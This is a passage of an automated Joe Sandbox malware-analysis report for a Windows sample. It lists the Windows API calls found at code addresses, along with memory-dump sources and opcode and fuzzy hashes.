                                            • Opcode ID: 4caefdb3a2eb5ee4cfff01b8828168da2bd12341909175144d7b1bc9d4abe674
                                            • Instruction ID: a4d616ae3321a3a7947b2c1be3718e83bc66080fc401da3c7a9e131e00a74b07
                                            • Opcode Fuzzy Hash: 4caefdb3a2eb5ee4cfff01b8828168da2bd12341909175144d7b1bc9d4abe674
                                            • Instruction Fuzzy Hash: 25E0A572985328BADB205FA2EC0DEDB7E5CEF167A1F048036F609E5061C671C5449BE1
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 00E12231
                                            • SetTextColor.GDI32(?,000000FF), ref: 00E1223B
                                            • SetBkMode.GDI32(?,00000001), ref: 00E12250
                                            • GetStockObject.GDI32(00000005), ref: 00E12258
                                            • GetWindowDC.USER32(?,00000000), ref: 00E4C0D3
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E4C0E0
                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00E4C0F9
                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00E4C112
                                            • GetPixel.GDI32(00000000,?,?), ref: 00E4C132
                                            • ReleaseDC.USER32(?,00000000), ref: 00E4C13D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                            • String ID:
                                            • API String ID: 1946975507-0
                                            • Opcode ID: 0e755556f8558f8ed3ed523112956c5c711809229f49e8894efc864ab4229d88
                                            • Instruction ID: 5d3a52ea79b525e3f807e6bbbc17e41e24689404233407aad5fd35afaa1f2a30
                                            • Opcode Fuzzy Hash: 0e755556f8558f8ed3ed523112956c5c711809229f49e8894efc864ab4229d88
                                            • Instruction Fuzzy Hash: F9E06D32201244EEDB215FA6FC0D7D83B20EB05336F10836BFA69A80F287714994DB52
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 00E68C63
                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E6882E), ref: 00E68C6A
                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E6882E), ref: 00E68C77
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E6882E), ref: 00E68C7E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CurrentOpenProcessThreadToken
                                            • String ID:
                                            • API String ID: 3974789173-0
                                            • Opcode ID: fb713ed2404e8bb480a360b495b868e026f78cdb1b68e9d7f1b99a6161bd4526
                                            • Instruction ID: cf4fd24b51df05da5e2ecbcb7170891f25e660621593ede6467db92b0704c818
                                            • Opcode Fuzzy Hash: fb713ed2404e8bb480a360b495b868e026f78cdb1b68e9d7f1b99a6161bd4526
                                            • Instruction Fuzzy Hash: 6FE02672642210DFD7205FB26E0CB463BACEF507E2F05482AF645F9080DA348449CB21
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00E52187
                                            • GetDC.USER32(00000000), ref: 00E52191
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E521B1
                                            • ReleaseDC.USER32(?), ref: 00E521D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: 9047b0e80b628635c929b8d6021c6f953506ba02e9ff650629558f62147676d0
                                            • Instruction ID: c204b116e784f2fac6230b47a8db5e2d905506aea66588443b16a3898d5f278a
                                            • Opcode Fuzzy Hash: 9047b0e80b628635c929b8d6021c6f953506ba02e9ff650629558f62147676d0
                                            • Instruction Fuzzy Hash: AFE0C275840704AFDB019F61C808A9D7BA5AB48351F20842BE95AE6261CB7881859F80
                                            APIs
                                            • GetDesktopWindow.USER32 ref: 00E5219B
                                            • GetDC.USER32(00000000), ref: 00E521A5
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E521B1
                                            • ReleaseDC.USER32(?), ref: 00E521D2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: fdd1c8020d1e592ffd57fcfe105618b8190dc519939b16b8e0e6247ac1c2393a
                                            • Instruction ID: 944c5d437ed5b8faddf84b6b75f9ef427ad4ea52477cd3632fab5b20196d9b17
                                            • Opcode Fuzzy Hash: fdd1c8020d1e592ffd57fcfe105618b8190dc519939b16b8e0e6247ac1c2393a
                                            • Instruction Fuzzy Hash: D9E0E575800304AFCB019F71C80869D7BE5AB4C310F208427F95AE7261CB7891859F80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %
                                            • API String ID: 0-2291192146
                                            • Opcode ID: 3b26ae1052a504e60f30bb40de8f60c90caf7eda111f848ac51dc335c580c6c8
                                            • Instruction ID: 98880b1c1e6e69582146488485f742ac96feb08aab4bf12e87245e4b96b6e927
                                            • Opcode Fuzzy Hash: 3b26ae1052a504e60f30bb40de8f60c90caf7eda111f848ac51dc335c580c6c8
                                            • Instruction Fuzzy Hash: 88B1A0719042099BCF24EF98C8819FEBBB5FF44310F546426E952B7295EB309EC2CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __itow_s
                                            • String ID: xr$xr
                                            • API String ID: 3653519197-2528877900
                                            • Opcode ID: 2a99f1dba166adc7d891d96bd2f9e0f61bcfd9fd1e503501bef816da1163c7d7
                                            • Instruction ID: 58f9f5625ece7a306f1ca7b2f216a72da42d41c7ed81f44fa2fa5599502c1c6b
                                            • Opcode Fuzzy Hash: 2a99f1dba166adc7d891d96bd2f9e0f61bcfd9fd1e503501bef816da1163c7d7
                                            • Instruction Fuzzy Hash: 0AB16E70A04209ABDB14EF54C891DEEB7FAFF58304F149459F94DAB252EB70E981CB50
                                            APIs
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • __wcsnicmp.LIBCMT ref: 00E7B298
                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E7B361
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                            • String ID: LPT
                                            • API String ID: 3222508074-1350329615
                                            • Opcode ID: 8ba11db64bbf6c05af1fd56521ad1ecc6ed9b299e1bb41448de8db2e9ac0abf1
                                            • Instruction ID: 0c1cf83deee2644896b3151a321971a4aac39aac60415ca0d6162dc2bd88992d
                                            • Opcode Fuzzy Hash: 8ba11db64bbf6c05af1fd56521ad1ecc6ed9b299e1bb41448de8db2e9ac0abf1
                                            • Instruction Fuzzy Hash: A0615D75A00215AFCB14DF94C895FEEB7F4AF48314F15906AF94ABB291DB70AE80CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: Oa
                                            • API String ID: 4104443479-3945284152
                                            • Opcode ID: 769f79d3d460f16f7aae80f6ce9a1feb3a660d7176c99efbb24825c101979b8f
                                            • Instruction ID: 45e6abcb6f5a4531088cb7f1d3a2cbd8cdda59004be6de8f7f6efee98adff000
                                            • Opcode Fuzzy Hash: 769f79d3d460f16f7aae80f6ce9a1feb3a660d7176c99efbb24825c101979b8f
                                            • Instruction Fuzzy Hash: 9551A1B0A00619DFCF64CF68C580AAEBBF5FF44309F10592AE85AF7250DB30A959CB51
                                            APIs
                                            • Sleep.KERNEL32(00000000), ref: 00E22AC8
                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E22AE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: GlobalMemorySleepStatus
                                            • String ID: @
                                            • API String ID: 2783356886-2766056989
                                            • Opcode ID: c9983cf8ddd66f349b5291a518ee8f3d1b8d43646a49b56a08c7cf8a22f36eba
                                            • Instruction ID: 5a1479e3bdc42c9eec7c84a30bd69d351c4e3643bcc7381085e901b5310a594c
                                            • Opcode Fuzzy Hash: c9983cf8ddd66f349b5291a518ee8f3d1b8d43646a49b56a08c7cf8a22f36eba
                                            • Instruction Fuzzy Hash: 625148724187449BD320AF11D896BAFBBE8FF84310F42485DF2D9611A2DB31896DCB56
                                            APIs
                                              • Part of subcall function 00E1506B: __fread_nolock.LIBCMT ref: 00E15089
                                            • _wcscmp.LIBCMT ref: 00E79AAE
                                            • _wcscmp.LIBCMT ref: 00E79AC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscmp$__fread_nolock
                                            • String ID: FILE
                                            • API String ID: 4029003684-3121273764
                                            • Opcode ID: dca68170bb1334fe5920804d9a2ca7c82b72f6553d8e7f930c8bf685afceb02a
                                            • Instruction ID: 346f9fa421f35adc15af62fa2b435bd6b7086e20c4cc16a6c4788dbd4fe7f146
                                            • Opcode Fuzzy Hash: dca68170bb1334fe5920804d9a2ca7c82b72f6553d8e7f930c8bf685afceb02a
                                            • Instruction Fuzzy Hash: 2E41D872A00609BADF209AA4DC46FEFBBFDDF49714F00507AB904B7181D675AA44C7A1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClearVariant
                                            • String ID: Dt$Dt
                                            • API String ID: 1473721057-4168040075
                                            • Opcode ID: 92fe659ad00ab9839354764fe4093171677251ed623d626d59c0ad9d2c415714
                                            • Instruction ID: 0928df9ddcd881a150fb595b48391a6fa07c295d4a45acb62f9491d47aa552c2
                                            • Opcode Fuzzy Hash: 92fe659ad00ab9839354764fe4093171677251ed623d626d59c0ad9d2c415714
                                            • Instruction Fuzzy Hash: 2F51F8746093418FC754CF19C18066ABBE1FF99358F58686DF895AB321E331EC85CB42
                                            APIs
                                            • _memset.LIBCMT ref: 00E82892
                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E828C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CrackInternet_memset
                                            • String ID: |
                                            • API String ID: 1413715105-2343686810
                                            • Opcode ID: 9092036fee0740f5e5f9915c5cc4d7174b8e7c108eb8ec620d86afe1523c427c
                                            • Instruction ID: 2c96e13978e3b6d6343deab97c1500fc3cb231bf4b4918d0935ffb3b4cc6e106
                                            • Opcode Fuzzy Hash: 9092036fee0740f5e5f9915c5cc4d7174b8e7c108eb8ec620d86afe1523c427c
                                            • Instruction Fuzzy Hash: 58311971800119AFCF05AFA1CC85EEEBFB9FF08300F105029F959B6166DB315A96DBA0
                                            APIs
                                            • DestroyWindow.USER32(?,?,?,?), ref: 00E96D86
                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E96DC2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$DestroyMove
                                            • String ID: static
                                            • API String ID: 2139405536-2160076837
                                            • Opcode ID: 873ab69045011b88bf48e5e3534a6e6cbeabe8fe8d5ef7e68713faed92e751a2
                                            • Instruction ID: ae43cc89fdb06fb4e4935de54241c91630d9a81a22df0f89f7d165ab00c266ec
                                            • Opcode Fuzzy Hash: 873ab69045011b88bf48e5e3534a6e6cbeabe8fe8d5ef7e68713faed92e751a2
                                            • Instruction Fuzzy Hash: 8031A171210604AEDF109F64DC40AFB73B9FF48724F10A51AF9A5E7190CB31AC95CB60
                                            APIs
                                            • _memset.LIBCMT ref: 00E72E00
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E72E3B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 53603087c842768d16e1df0fd3d57330ecbe6689c4dce945d1ecbec841f60c1c
                                            • Instruction ID: 38c1aa78cc8fa7df548531fd3a287bc1a0d81fc2042af513daf593c5d0ba88a6
                                            • Opcode Fuzzy Hash: 53603087c842768d16e1df0fd3d57330ecbe6689c4dce945d1ecbec841f60c1c
                                            • Instruction Fuzzy Hash: A431F531A00305ABEB268F58C845BAEBBF9EF05344F14A02EEAC9B61A0D7709944CB11
                                            APIs
                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E969D0
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E969DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: Combobox
                                            • API String ID: 3850602802-2096851135
                                            • Opcode ID: b29e91c43af39bddf36735976958b95771aea3a7c4630c54960642100cb6cac4
                                            • Instruction ID: 85660a77dc7cf920be27c2fab180aa9a9120e892f73e49f80854c6025e098ac2
                                            • Opcode Fuzzy Hash: b29e91c43af39bddf36735976958b95771aea3a7c4630c54960642100cb6cac4
                                            • Instruction Fuzzy Hash: EE11B2716002086FEF119E24DC90EEB37AAEB893A8F111126F958BB290D6719C9187A0
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • GetWindowRect.USER32(00000000,?), ref: 00E96EE0
                                            • GetSysColor.USER32(00000012), ref: 00E96EFA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                            • String ID: static
                                            • API String ID: 1983116058-2160076837
                                            • Opcode ID: 5bca64685bc640a221e3840cc411793e66f2b2d4a77edc48ba1ab907ed1f1f58
                                            • Instruction ID: ae2ddbded5bc8d9130bd4ede6824fbfa44435e9ba22920abbe7ce53282002c1a
                                            • Opcode Fuzzy Hash: 5bca64685bc640a221e3840cc411793e66f2b2d4a77edc48ba1ab907ed1f1f58
                                            • Instruction Fuzzy Hash: 3F212972610209AFDF04DFA8DD45AEA7BB8FB08314F05562AF955E3250D734E8619B50
                                            APIs
                                            • GetWindowTextLengthW.USER32(00000000), ref: 00E96C11
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E96C20
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LengthMessageSendTextWindow
                                            • String ID: edit
                                            • API String ID: 2978978980-2167791130
                                            • Opcode ID: 59ee3a5fbd8a632493d612f8091364f458a3bc806fb95b2adef079f25ff20e88
                                            • Instruction ID: 44e2e2adbab42ae1ba48b3848914c76a61f99cb0866b0f88a4cb92d6a625df3d
                                            • Opcode Fuzzy Hash: 59ee3a5fbd8a632493d612f8091364f458a3bc806fb95b2adef079f25ff20e88
                                            • Instruction Fuzzy Hash: 89116A71501208AFEF108E64DC45AEA37A9EB04368F605726F961E71E0E775DC919B60
                                            APIs
                                            • _memset.LIBCMT ref: 00E72F11
                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E72F30
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 89428a10ef72f2d43dda993e3ae9b5cfe23e004d516cd6affc3e0e389356c679
                                            • Instruction ID: 0af68bde849c90788d8401d9e35f0c5f94f61aca6ff14edf86e0a6b491897764
                                            • Opcode Fuzzy Hash: 89428a10ef72f2d43dda993e3ae9b5cfe23e004d516cd6affc3e0e389356c679
                                            • Instruction Fuzzy Hash: A311B231E01214AFDB39DB58DC44B9977B9EB05318F1490AAEA58B72A0D7B0AD05C791
                                            APIs
                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E82520
                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E82549
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
